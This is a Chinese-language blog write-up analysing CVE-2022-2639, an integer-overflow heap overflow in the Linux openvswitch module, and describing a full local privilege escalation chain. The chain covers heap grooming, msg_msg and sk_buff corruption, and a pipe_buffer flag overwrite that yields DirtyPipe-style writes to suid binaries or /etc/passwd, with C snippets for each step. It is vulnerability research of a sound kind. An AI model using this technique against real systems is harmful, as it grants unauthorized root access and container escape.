CVE-2022-2639 openvswitch LPE 漏洞分析

veritas501

2022-10-18 (Updated: 2023-12-08)

kernel

简介

在Linux kernel 的 openvswitch 模块中存在一处由整数溢出导致的堆越界写。成功利用这个漏洞会导致Linux kernel本地提权或是容器逃逸。

漏洞分析

漏洞分析基于Linux kernel 5.13。源码下载：

1	git clone git://kernel.ubuntu.com/ubuntu/ubuntu-focal.git -b Ubuntu-hwe-5.13-5.13.0-35.40_20.04.1 --depth 1

漏洞本身并不复杂，可以直接看patch：

diff --git a/net/openvswitch/flow_netlink.c b/net/openvswitch/flow_netlink.c
index 7176156d38443c..4c09cf8a0ab2dc 100644
--- a/net/openvswitch/flow_netlink.c
+++ b/net/openvswitch/flow_netlink.c
@@ -2465,7 +2465,7 @@ static struct nlattr *reserve_sfa_size(struct sw_flow_actions **sfa,
 	new_acts_size = max(next_offset + req_size, ksize(*sfa) * 2);
 
 	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
-		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {
+		if ((next_offset + req_size) > MAX_ACTIONS_BUFSIZE) {
 			OVS_NLERR(log, "Flow action size exceeds max %u",
 				  MAX_ACTIONS_BUFSIZE);
 			return ERR_PTR(-EMSGSIZE);

注意到不等式左边的next_offset为有符号，而右边的req_size为无符号。在两端比大小之前，左边相减的结果可能为负数，随即被cast成无符号与右边比较。如果是负数就会变成很大的正数，从而使check失效。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:2338
/* 2338 */ static struct nlattr *reserve_sfa_size(struct sw_flow_actions **sfa,
/* 2339 */ 				       int attr_len, bool log)
/* 2340 */ {
/* 2341 */ 
/* 2342 */ 	struct sw_flow_actions *acts;
/* 2343 */ 	int new_acts_size;
/* 2344 */ 	size_t req_size = NLA_ALIGN(attr_len);
/* 2345 */ 	int next_offset = offsetof(struct sw_flow_actions, actions) +
/* 2346 */ 					(*sfa)->actions_len;
------
/* 2351 */ 	new_acts_size = max(next_offset + req_size, ksize(*sfa) * 2);
/* 2352 */ 
/* 2353 */ 	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
/* 2354 */ 		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {
/* 2355 */ 			OVS_NLERR(log, "Flow action size exceeds max %u",
/* 2356 */ 				  MAX_ACTIONS_BUFSIZE);
/* 2357 */ 			return ERR_PTR(-EMSGSIZE);
/* 2358 */ 		}

而MAX_ACTIONS_BUFSIZE的大小为0x8000，即如果能够让next_offset大于0x8000就能绕过判断。

1 2	// >>> linux-5.13/net/openvswitch/flow_netlink.c:2275 /* 2275 / #define MAX_ACTIONS_BUFSIZE (32 1024)

绕过判断就会顺势执行到2359行，new_acts_size被赋值为0x8000，之后在2362行分配新buffer，并在2366行将内容拷贝到新申请的buffer中。并最终返回buffer+next_offset的地址。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:2353
/* 2353 */ 	if (new_acts_size > MAX_ACTIONS_BUFSIZE) {
/* 2354 */ 		if ((MAX_ACTIONS_BUFSIZE - next_offset) < req_size) {
------
/* 2358 */ 		}
/* 2359 */ 		new_acts_size = MAX_ACTIONS_BUFSIZE;
/* 2360 */ 	}
/* 2361 */ 
/* 2362 */ 	acts = nla_alloc_flow_actions(new_acts_size);
------
/* 2366 */ 	memcpy(acts->actions, (*sfa)->actions, (*sfa)->actions_len);
/* 2367 */ 	acts->actions_len = (*sfa)->actions_len;
/* 2368 */ 	acts->orig_len = (*sfa)->orig_len;
/* 2369 */ 	kfree(*sfa);
/* 2370 */ 	*sfa = acts;
/* 2371 */ 
/* 2372 */ out:
/* 2373 */ 	(*sfa)->actions_len += req_size;
/* 2374 */ 	return  (struct nlattr *) ((unsigned char *)(*sfa) + next_offset);
/* 2375 */ }

来到调用reserve_sfa_size()的外层，3027行的to已经带上了前面的offset，并最后在3031行的memcpy处发生堆越界写。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3021
/* 3021 */ static int copy_action(const struct nlattr *from,
/* 3022 */ 		       struct sw_flow_actions **sfa, bool log)
/* 3023 */ {
/* 3024 */ 	int totlen = NLA_ALIGN(from->nla_len);
/* 3025 */ 	struct nlattr *to;
/* 3026 */ 
/* 3027 */ 	to = reserve_sfa_size(sfa, from->nla_len, log);
------
    		// heap buffer oob write
/* 3031 */ 	memcpy(to, from, totlen);

Just a BUG ??

搞清楚了这个bug的成因后，便是开始尝试编写POC证明这里的确能够溢出，而不是停留于“理论上”。而这显然没有想象中那么容易。

首先我们需要更多的信息！读更多的源码！

看一下分配之前buffer的函数，其实就是简单的使用kmalloc，包含一个struct sw_flow_actions的header，后面紧跟着buffer。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:2277
/* 2277 */ static struct sw_flow_actions *nla_alloc_flow_actions(int size)
/* 2278 */ {
/* 2279 */ 	struct sw_flow_actions *sfa;
/* 2280 */ 
/* 2281 */ 	WARN_ON_ONCE(size > MAX_ACTIONS_BUFSIZE);
/* 2282 */ 
/* 2283 */ 	sfa = kmalloc(sizeof(*sfa) + size, GFP_KERNEL);
/* 2284 */ 	if (!sfa)
/* 2285 */ 		return ERR_PTR(-ENOMEM);
/* 2286 */ 
/* 2287 */ 	sfa->actions_len = 0;
/* 2288 */ 	return sfa;
/* 2289 */ }

sizeof(struct sw_flow_actions)为0x20，再由于对齐，所以并不会分配0x8020的chunk，而是分配了0x10000的chunk（注意这里的0x10000）。

同时我还发现，openvswitch通过netlink进行通信。而这之中用到了名为nlattr的结构体：

/*
 *  <------- NLA_HDRLEN ------> <-- NLA_ALIGN(payload)-->
 * +---------------------+- - -+- - - - - - - - - -+- - -+
 * |        Header       | Pad |     Payload       | Pad |
 * |   (struct nlattr)   | ing |                   | ing |
 * +---------------------+- - -+- - - - - - - - - -+- - -+
 *  <-------------- nlattr->nla_len -------------->
 */

struct nlattr {
	__u16           nla_len;
	__u16           nla_type;
};

注意这里所有的字段都是存在padding的，而这个padding值为4bytes。

1 2	#define NLA_ALIGNTO 4 #define NLA_ALIGN(len) (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1))

此外，也是最最重要的，len字段为u16类型，也就是说我们的payload撑死就只有0xFFFF的的大小，而前面在申请buffer时分配了0x10000的chunk，看起来完全没法溢出啊。

有人可能在想，那一个不行，能不能连续用两个？还是不行。

因为前面说到openvswitch模块使用netlink进行通信，所以首先需要遵守netlink通信时的数据结构，也就是struct nlmsghdr这个header。之后，netlink又有很多种类，可以在netlink.h中找到定义：

#define NETLINK_ROUTE		0	/* Routing/device hook				*/
#define NETLINK_UNUSED		1	/* Unused number				*/
#define NETLINK_USERSOCK	2	/* Reserved for user mode socket protocols 	*/
#define NETLINK_FIREWALL	3	/* Unused number, formerly ip_queue		*/
#define NETLINK_SOCK_DIAG	4	/* socket monitoring				*/
#define NETLINK_NFLOG		5	/* netfilter/iptables ULOG */
......
#define NETLINK_IP6_FW		13
#define NETLINK_DNRTMSG		14	/* DECnet routing messages */
#define NETLINK_KOBJECT_UEVENT	15	/* Kernel messages to userspace */
#define NETLINK_GENERIC		16
......

而我们的openvswitch属于NETLINK_GENERIC，因此在struct nlmsghdr中还得包着struct genlmsghdr；再在这里面才是喂给openvswitch的数据，也就是前面提到的struct nlattr。而前面的漏洞位于拷贝flow actions的场景中，而 flow actions 又是主struct nlattr中的一个子struct nlattr。

因此在这种层层限制下，第一层nlattr的长度就已经不超过0xFFFF了，那自然子nlattr的长度之和也没法超过0x10000了。

看起来确实没戏了？？

It’s a vulnerability !!

在__ovs_nla_copy_actions()中有如下一段代码，描述了各个action attr的数据长度，其中-1表示不定长，否则为定长。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3047
/* 3047 */ 		static const u32 action_lens[OVS_ACTION_ATTR_MAX + 1] = {
/* 3048 */ 			[OVS_ACTION_ATTR_OUTPUT] = sizeof(u32),
/* 3049 */ 			[OVS_ACTION_ATTR_RECIRC] = sizeof(u32),
/* 3050 */ 			[OVS_ACTION_ATTR_USERSPACE] = (u32)-1,
/* 3051 */ 			[OVS_ACTION_ATTR_PUSH_MPLS] = sizeof(struct ovs_action_push_mpls),
/* 3052 */ 			[OVS_ACTION_ATTR_POP_MPLS] = sizeof(__be16),
/* 3053 */ 			[OVS_ACTION_ATTR_PUSH_VLAN] = sizeof(struct ovs_action_push_vlan),
/* 3054 */ 			[OVS_ACTION_ATTR_POP_VLAN] = 0,
/* 3055 */ 			[OVS_ACTION_ATTR_SET] = (u32)-1,
/* 3056 */ 			[OVS_ACTION_ATTR_SET_MASKED] = (u32)-1,
/* 3057 */ 			[OVS_ACTION_ATTR_SAMPLE] = (u32)-1,
/* 3058 */ 			[OVS_ACTION_ATTR_HASH] = sizeof(struct ovs_action_hash),
/* 3059 */ 			[OVS_ACTION_ATTR_CT] = (u32)-1,
/* 3060 */ 			[OVS_ACTION_ATTR_CT_CLEAR] = 0,
/* 3061 */ 			[OVS_ACTION_ATTR_TRUNC] = sizeof(struct ovs_action_trunc),
/* 3062 */ 			[OVS_ACTION_ATTR_PUSH_ETH] = sizeof(struct ovs_action_push_eth),
/* 3063 */ 			[OVS_ACTION_ATTR_POP_ETH] = 0,
/* 3064 */ 			[OVS_ACTION_ATTR_PUSH_NSH] = (u32)-1,
/* 3065 */ 			[OVS_ACTION_ATTR_POP_NSH] = 0,
/* 3066 */ 			[OVS_ACTION_ATTR_METER] = sizeof(u32),
/* 3067 */ 			[OVS_ACTION_ATTR_CLONE] = (u32)-1,
/* 3068 */ 			[OVS_ACTION_ATTR_CHECK_PKT_LEN] = (u32)-1,
/* 3069 */ 			[OVS_ACTION_ATTR_ADD_MPLS] = sizeof(struct ovs_action_add_mpls),
/* 3070 */ 			[OVS_ACTION_ATTR_DEC_TTL] = (u32)-1,
/* 3071 */ 		};

一般来说，我们传入的子nlattr和最后add action中的长度是一致的，比如上面的OVS_ACTION_ATTR_PUSH_MPLS，它的长度固定为sizeof(struct ovs_action_push_mpls)，简单做一下校验就会传入通用的copy_action()函数中，因为skip_copy = false。

// >>> ../ubuntu-focal/net/openvswitch/flow_netlink.c:3081
/* 3081 */ 		skip_copy = false;
/* 3082 */ 		switch (type) {
------
/* 3165 */ 		case OVS_ACTION_ATTR_PUSH_MPLS: {
/* 3166 */ 			const struct ovs_action_push_mpls *mpls = nla_data(a);
/* 3167 */ 
/* 3168 */ 			if (!eth_p_mpls(mpls->mpls_ethertype))
/* 3169 */ 				return -EINVAL;
/* 3170 */ 			/* Prohibit push MPLS other than to a white list
/* 3171 */ 			 * for packets that have a known tag order.
/* 3172 */ 			 */
/* 3173 */ 			if (vlan_tci & htons(VLAN_CFI_MASK) ||
/* 3174 */ 			    (eth_type != htons(ETH_P_IP) &&
/* 3175 */ 			     eth_type != htons(ETH_P_IPV6) &&
/* 3176 */ 			     eth_type != htons(ETH_P_ARP) &&
/* 3177 */ 			     eth_type != htons(ETH_P_RARP) &&
/* 3178 */ 			     !eth_p_mpls(eth_type)))
/* 3179 */ 				return -EINVAL;
/* 3180 */ 			eth_type = mpls->mpls_ethertype;
/* 3181 */ 			mpls_label_count++;
/* 3182 */ 			break;
/* 3183 */ 		}
------
/* 3344 */ 		if (!skip_copy) {
/* 3345 */ 			err = copy_action(a, sfa, log);
/* 3346 */ 			if (err)
/* 3347 */ 				return err;
/* 3348 */ 		}

但通过仔细观察，其中有若干特例，例如OVS_ACTION_ATTR_CT可以拿来利用，首先它设置了skip_copy = true，说明copy action它会在ovs_ct_copy_action()中自己来拷贝。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3246
/* 3246 */ 		case OVS_ACTION_ATTR_CT:
/* 3247 */ 			err = ovs_ct_copy_action(net, a, key, sfa, log);
/* 3248 */ 			if (err)
/* 3249 */ 				return err;
/* 3250 */ 			skip_copy = true;
/* 3251 */ 			break;

// >>> linux-5.13/net/openvswitch/conntrack.c:1667
/* 1667 */ int ovs_ct_copy_action(struct net *net, const struct nlattr *attr,
/* 1668 */ 		       const struct sw_flow_key *key,
/* 1669 */ 		       struct sw_flow_actions **sfa,  bool log)
/* 1670 */ {
/* 1671 */ 	struct ovs_conntrack_info ct_info;
------
/* 1688 */ 	err = parse_ct(attr, &ct_info, &helper, log);
------
/* 1716 */ 	err = ovs_nla_add_action(sfa, OVS_ACTION_ATTR_CT, &ct_info,
/* 1717 */ 				 sizeof(ct_info), log);

而在parse_ct()中，我们只需要8字节就能构造出合法的nlattr。而在1716行add action时传入的结构体却是struct ovs_conntrack_info，且大小为sizeof(struct ovs_conntrack_info)。

这个结构体在 Kernel 5.13 中为0xA0字节，这就起到了放大的作用！

假设我们添加500个OVS_ACTION_ATTR_CT的nlattr，那只用了500*8 = 0xFA0字节的nlattr长度，却让我们最前面提到的buffer的next_offset成功增加了0x500*0xa0 = 0x13880字节！溢出发生！！

但使用struct ovs_conntrack_info对编写exploit有个坏处，就是这个结构体在内核版本的更迭中被修改过多次，导致在不同版本的内核其大小并不固定。

为了解决这个痛点，只能去寻找其他的结构体，然后，我找到了OVS_ACTION_ATTR_SET。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3217
/* 3217 */ 		case OVS_ACTION_ATTR_SET:
/* 3218 */ 			err = validate_set(a, key, sfa,
/* 3219 */ 					   &skip_copy, mac_proto, eth_type,
/* 3220 */ 					   false, log);
/* 3221 */ 			if (err)
/* 3222 */ 				return err;
/* 3223 */ 			break;

这里看起来没有主动设置skip_copy，但仔细看会发现它将skip_copy指针拷贝到了validate_set()中进行处理。

// >>> ../ubuntu-focal/net/openvswitch/flow_netlink.c:2744
/* 2744 */ static int validate_set(const struct nlattr *a,
/* 2745 */ 			const struct sw_flow_key *flow_key,
/* 2746 */ 			struct sw_flow_actions **sfa, bool *skip_copy,
/* 2747 */ 			u8 mac_proto, __be16 eth_type, bool masked, bool log)
/* 2748 */ {
    		// 取出内层嵌套的nlattr
/* 2749 */ 	const struct nlattr *ovs_key = nla_data(a);
/* 2750 */ 	int key_type = nla_type(ovs_key);
/* 2751 */ 	size_t key_len;
------
    		// data length 作为 key_len
/* 2757 */ 	key_len = nla_len(ovs_key);
    		// 从OVS_ACTION_ATTR_SET走不设置masked
/* 2758 */ 	if (masked)
/* 2759 */ 		key_len /= 2;
------
    		// 注意这里的check_attr_len(), key_len 不是随便给的
/* 2761 */ 	if (key_type > OVS_KEY_ATTR_MAX ||
/* 2762 */ 	    !check_attr_len(key_len, ovs_key_lens[key_type].len))
/* 2763 */ 		return -EINVAL;
------
/* 2768 */ 	switch (key_type) {
------
    		// 对 key_type == OVS_KEY_ATTR_ETHERNET 来说只是简单的check
/* 2775 */ 	case OVS_KEY_ATTR_ETHERNET:
/* 2776 */ 		if (mac_proto != MAC_PROTO_ETHERNET)
/* 2777 */ 			return -EINVAL;
/* 2778 */ 		break;
------
/* 2883 */ 	}
/* 2884 */ 
    		// 进入这段关键逻辑
/* 2885 */ 	/* Convert non-masked non-tunnel set actions to masked set actions. */
/* 2886 */ 	if (!masked && key_type != OVS_KEY_ATTR_TUNNEL) {
    			// 注意到len为key_len的两倍
/* 2887 */ 		int start, len = key_len * 2;
/* 2888 */ 		struct nlattr *at;
/* 2889 */ 
    			// 设置 skip_copy， 跳过外层的默认的copy_action
/* 2890 */ 		*skip_copy = true;
/* 2891 */ 
/* 2892 */ 		start = add_nested_action_start(sfa,
/* 2893 */ 						OVS_ACTION_ATTR_SET_TO_MASKED,
/* 2894 */ 						log);
/* 2895 */ 		if (start < 0)
/* 2896 */ 			return start;
/* 2897 */ 
    			// 调用__add_action， 注意此处的len为key_len两倍
/* 2898 */ 		at = __add_action(sfa, key_type, NULL, len, log);
/* 2899 */ 		if (IS_ERR(at))
/* 2900 */ 			return PTR_ERR(at);
/* 2901 */ 
/* 2902 */ 		memcpy(nla_data(at), nla_data(ovs_key), key_len); /* Key. */
/* 2903 */ 		memset(nla_data(at) + key_len, 0xff, key_len);    /* Mask. */

假设我们内部嵌套的nlattr type为OVS_KEY_ATTR_ETHERNET，首先要通过2762行对data length的校验，即length等于sizeof(struct ovs_key_ethernet) == 0x0C。

// >>> ../ubuntu-focal/net/openvswitch/flow_netlink.c:406
/* 406 */ /* The size of the argument for each %OVS_KEY_ATTR_* Netlink attribute.  */
/* 407 */ static const struct ovs_len_tbl ovs_key_lens[OVS_KEY_ATTR_MAX + 1] = {
------
/* 412 */ 	[OVS_KEY_ATTR_ETHERNET]	 = { .len = sizeof(struct ovs_key_ethernet) },

之后关键逻辑出现在第2887行，最后添加的action长度为原长的两倍，即0x18。

算上添加这个nlattr所需的两层header（嵌套），即需要使用0x04 + 0x04 + 0x0C == 0x14字节的内存就让最前面提出的buffer的指针前进0x04 + 0x04 + 0x0C * 2 == 0x20字节。虽然放大比例不如sizeof(struct ovs_conntrack_info)，但好在其在能用来溢出的前提下，保证了更优的稳定性（无需根据内核版本来计算结构体的大小）。

可以在copy_action()的memcpy处（3031行）观察到此次溢出。

// >>> linux-5.13/net/openvswitch/flow_netlink.c:3021
/* 3021 */ static int copy_action(const struct nlattr *from,
/* 3022 */ 		       struct sw_flow_actions **sfa, bool log)
/* 3023 */ {
/* 3024 */ 	int totlen = NLA_ALIGN(from->nla_len);
/* 3025 */ 	struct nlattr *to;
/* 3026 */ 
/* 3027 */ 	to = reserve_sfa_size(sfa, from->nla_len, log);
/* 3028 */ 	if (IS_ERR(to))
/* 3029 */ 		return PTR_ERR(to);
/* 3030 */ 
/* 3031 */ 	memcpy(to, from, totlen);
/* 3032 */ 	return 0;
/* 3033 */ }

漏洞利用

在POC中我们可以清晰的看到heap上发生了buffer overflow，且溢出发生在0x10000的堆块上。

根据之前漏洞利用的经验，我还是打算请出我的老朋友struct msg_msg。但相信有点经验的朋友都会发现，msg最大只能申请0x1000的chunk，完全不是一个量级，也不在一个slab中。因此如果只是简单的堆喷msg_msg结构体并不能保证发生溢出的0x10000堆块后正好紧跟着struct msg_msg。

因此这里需要一些page level的风水技巧。这边非常感谢@etenal在CVE-2022-27666中提供的思路。某些原理和常识请移步etenal的分析，下面我直接讲我的操作。

首先介绍这次的风水好帮手packet rx_ring buffer，它能够帮助我们申请0x10000的chunk且在需要释放的时候释放。它的申请位置如下：

// >>> linux-5.13/net/packet/af_packet.c:3695
/* 3695 */ static int
/* 3696 */ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
/* 3697 */ 		  unsigned int optlen)
/* 3698 */ {
------
/* 3706 */ 	switch (optname) {
------
/* 3711 */ 		int len = optlen;
------
/* 3728 */ 	case PACKET_RX_RING:
/* 3729 */ 	case PACKET_TX_RING:
/* 3730 */ 	{
------
/* 3735 */ 		switch (po->tp_version) {
------
/* 3740 */ 		case TPACKET_V3:
------
    					// call here
/* 3751 */ 				ret = packet_set_ring(sk, &req_u, 0,
/* 3752 */ 						    optname == PACKET_TX_RING);

        
// >>> linux-5.13/net/packet/af_packet.c:4306
/* 4306 */ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
/* 4307 */ 		int closing, int tx_ring)
/* 4308 */ {
------
/* 4331 */ 	if (req->tp_block_nr) {
------
/* 4376 */ 		order = get_order(req->tp_block_size);
				// call here
/* 4377 */ 		pg_vec = alloc_pg_vec(req, order);

    
// >>> linux-5.13/net/packet/af_packet.c:4281
/* 4281 */ static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
/* 4282 */ {
/* 4283 */ 	unsigned int block_nr = req->tp_block_nr;
------
/* 4287 */ 	pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
------
/* 4291 */ 	for (i = 0; i < block_nr; i++) {
    			// alloc buffer !!!
/* 4292 */ 		pg_vec[i].buffer = alloc_one_pg_vec_page(order);

使用例子：

#include <linux/if_packet.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/ethernet.h>

void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    int v = TPACKET_V3;
    int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
    if (rv < 0) {
        die("setsockopt(PACKET_VERSION): %m");
    }

    struct tpacket_req3 req;
    memset(&req, 0, sizeof(req));
    req.tp_block_size = block_size;
    req.tp_frame_size = frame_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_nr = (block_size * block_nr) / frame_size;
    req.tp_retire_blk_tov = timeout;
    req.tp_sizeof_priv = sizeof_priv;
    req.tp_feature_req_word = 0;

    rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (rv < 0) {
        die("setsockopt(PACKET_RX_RING): %m");
    }
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) {
        die("socket(AF_PACKET): %m");
    }

    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
                               sizeof_priv, timeout);

    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");
    sa.sll_hatype = 0;
    sa.sll_pkttype = 0;
    sa.sll_halen = 0;

    int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
    if (rv < 0) {
        die("bind(AF_PACKET): %m");
    }

    return s;
}

int pagealloc_pad(int count, int size) {
    return packet_socket_setup(size, 2048, count, 0, 100);
}

int fd;

fd = pagealloc_pad(1, 0x10000) // 分配一个0x10000的chunk
close(fd) // 释放 chunk
    
fd = pagealloc_pad(100, 0x1000) // 分配 100 个 0x1000 的chunk
close(fd) // 一次性释放这个100个chunk

那么首先，我们用这个技巧把内核的堆整理一下，尽可能把freelist中的堆块都用完。

logd("do heap fengshui to reduce noise ...");
pagealloc_pad(1000, 0x1000);
pagealloc_pad(500, 0x2000);
pagealloc_pad(200, 0x4000);
pagealloc_pad(200, 0x8000);
pagealloc_pad(100, 0x10000);

接着，我们申请一些0x10000的堆块，由于刚整理过堆，因此内核中并不存在0x10000的空闲堆块，便会从order 5(0x20000)申请内存并分割成两个order 4(0x10000)。因此这里分配的0x10000的堆块地址极大概率是相连的。

之后我们每隔一个释放一个，由于从order 5分割出来的两个堆块并不同时处于freelist中，因此并没有被合并到order 5，而是停留在freelist中，从而大概率得到如下的堆布局：

#define fengshui_skfd_cnt (0x20)

int fengshui_skfd[fengshui_skfd_cnt];
for (int i = 0; i < fengshui_skfd_cnt; i++) {
	fengshui_skfd[i] = pagealloc_pad(1, 0x10000);
}
for (int i = 1; i < fengshui_skfd_cnt; i += 2) {
	close(fengshui_skfd[i]);
	fengshui_skfd[i] = -1;
}

接着我们堆喷struct msg_msg，包含一个0x1000的struct msg_msg和一个0x400的struct msg_msgseg。那么由于之前把堆清理干净了，这个放在freelist里的0x10000堆块就会被层层分割，提供给这两个结构体用。那大概率，这个0x10000堆块后面就会紧跟着一个struct msg_msg。

接着，我们把刚才留着的另一半rx_ring buffer也释放掉，依然因为两个order 4堆块不同时存在于freelist中，所以没有向上合并到order5而是停留在freelist中。

再调用前面的POC，struct nlattr自然落在了n个如上结构中的free堆块处，从而触发堆溢出修改相连msg的m_ts字段。

这样，我们就可以通过在msgrcv时使用MSG_COPY flag 来泄露struct msg_msgseg后面的数据。

大多数情况我们遇到这个msgseg后面正好跟着是另一个msg队列中的msgseg，从而根据预先写在msg buffer中的记号识别处对应的msg队列并释放它。随后另起一堆msg队列，且每个队列中塞16个0x400的msg，去占用释放的这个堆块。

队列如下：

借助上面被修改了ts的msg，我们再次越界读，这次读取到了B的next指针，从而知道了C的地址。

记住这个C，后面要用来UAF！！

我们故技重施，再次得到如下的结构，并调用POC代码触发堆溢出写，但这次我们修改的字段不是m_ts，而是m_list.next。刚才我们得到msg C的地址，我们将修改的m_list.next指针也指向它。

此时，我们通过C所在的msg队列将C释放，B和C处于同一队列，因此B中的next指针会由于正常的unlink被改掉，但由于A的m_list.next是我们修改的，不会由于unlink修改，从而得到了一个0x400 chunk的UAF。

接着再堆喷sk_buff->data，希望有一个sk_buff->data能够占用msg C的chunk。

稍微提一下，这个sk_buff->data是用于socket中的UDP的，大小为0x180~0x1000，前面是用户可控数据，后面0x140是struct skb_shared_info，且分配的flag为GFP_KERNEL_ACCOUNT。

由于sk_buff->data结构体的特性，我们可以伪造一个合法的msg头部出来：

这下，我们在通过msg A所在队列将sk_buff->data所在chunk 释放，得到一个sk_buff->data的UAF。

接着再堆喷struct pipe_buffer，指望能有一个pipe buffer和skbuff data共用一个chunk。且同时操作pipe，打开目标suid文件，并做好splice操作：

#define ATTACK_FILE "/usr/bin/mount"

// filled with pipe_buffer
logd("spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data");
int attack_fd = open(ATTACK_FILE, O_RDONLY);
if (attack_fd < 0) {
    die("open %s: %m", ATTACK_FILE);
}
for (int i = 0; i < NUM_PIPES; i++) {
    if (pipe(pipes[i])) {
        die("alloc pipe failed");
    }

    write(pipes[i][1], buff, 0x100 + i);

    loff_t offset = 1;
    ssize_t nbytes = splice(attack_fd, &offset, pipes[i][1], NULL, 1, 0);
    if (nbytes < 0) {
        die("splice() failed");
    }
}

这样就能 free skbuff data，泄露整个pipe buffer结构体，并转化为pipe buffer的UAF。

下一步很关键！因为我们并不需要泄露ops字段，而是直接奔着flags去。

因为我们并不做ROP，而是将其转化为类似DirtyPipe的场景，我们知道自从DirtyPipe被修复后，使用splice()时flags会被重新设置为0，而我们的目标就是将这个flags再次修改为PIPE_BUF_FLAG_CAN_MERGE，从而将DirtyPipe作为和ROP同级别的原语来使用，只不过后者是内核任意代码执行，而前者是任意文件修改，它们都能让我们得到本地权限提升。

具体可以参考 https://github.com/veritas501/pipe-primitive

在 kernel >= 5.8 中需要修改 pipe buffer 中 splice 页的flag |= PIPE_BUF_FLAG_CAN_MERGE即可（有能力可以顺便把offset和len改成0，这样就能从文件的开头开始写）；在 kernel < 5.8 中，需要先leak一下pipe_buffer中的anon_pipe_ops，然后将 splice 页的的ops改为anon_pipe_ops（因为<5.8版本中能否merge是看ops的）（有能力依然可以顺便把offset和len改成0）。

logd("edit pipe_buffer->flags");
{
    memset(buff, 0, sizeof(buff));
    memcpy(buff, pipe_buffer_backup, sizeof(pipe_buffer_backup));
    struct typ_pipe_buffer *ptr = (struct typ_pipe_buffer *)buff;
    ptr[1].flags = PIPE_BUF_FLAG_CAN_MERGE; // for kernel >= 5.8
    ptr[1].len = 0;
    ptr[1].offset = 0;
    ptr[1].ops = ptr[0].ops; // for kernel < 5.8
    spray_skbuff_data(buff, 0x400 - 0x140);
    hexdump(buff, sizeof(struct typ_pipe_buffer) * 2);
}

从而下次对pipe写入就会修改文件的page cache，得到和DirtyPipe一样任意文件写的能力！对本地提权来说只要修改suid程序的内容或是修改/etc/passwd即可。

通过pipe原语，我们就可以无需ROP从而得到一份几乎不用做版本适配的通用内核exploit代码，非常的完美。